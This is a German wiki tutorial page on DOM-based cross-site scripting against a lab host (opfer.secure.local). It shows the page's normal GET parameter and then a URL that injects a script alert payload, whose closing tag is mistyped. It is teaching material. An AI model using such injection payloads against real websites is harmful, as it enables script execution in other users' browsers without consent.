Cross-Site-Scripting "DOM-basiertes" Beispiele

Aus Xinux Wiki

Version vom 7. März 2023, 11:28 Uhr von Linkai.zhang (Diskussion | Beiträge)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Cross-Site-Scripting “Reflected”

Um was geht es?

DOM-basiertes Cross-Site-Scripting/XSS

Link

http://opfer.secure.local/scripts/xss-dom.html

Normale Verhaltensweise

Über den GET-Parameter default wird der Inhalt dieser Seite generiert
http://opfer.secure.local/scripts/xss-dom.html?default=Bitte%20auf%20dieser%20Seite%20JavaScript%20ausschalten

[[Bild:

Exploit über die URL

http://opfer.secure.local/scripts/xss-dom.html?default=<script>alert("Hacked by Xinux")<script>

Abgerufen von „http://wiki.ixheim.de/index.php?title=Cross-Site-Scripting_%22DOM-basiertes%22_Beispiele&oldid=42828“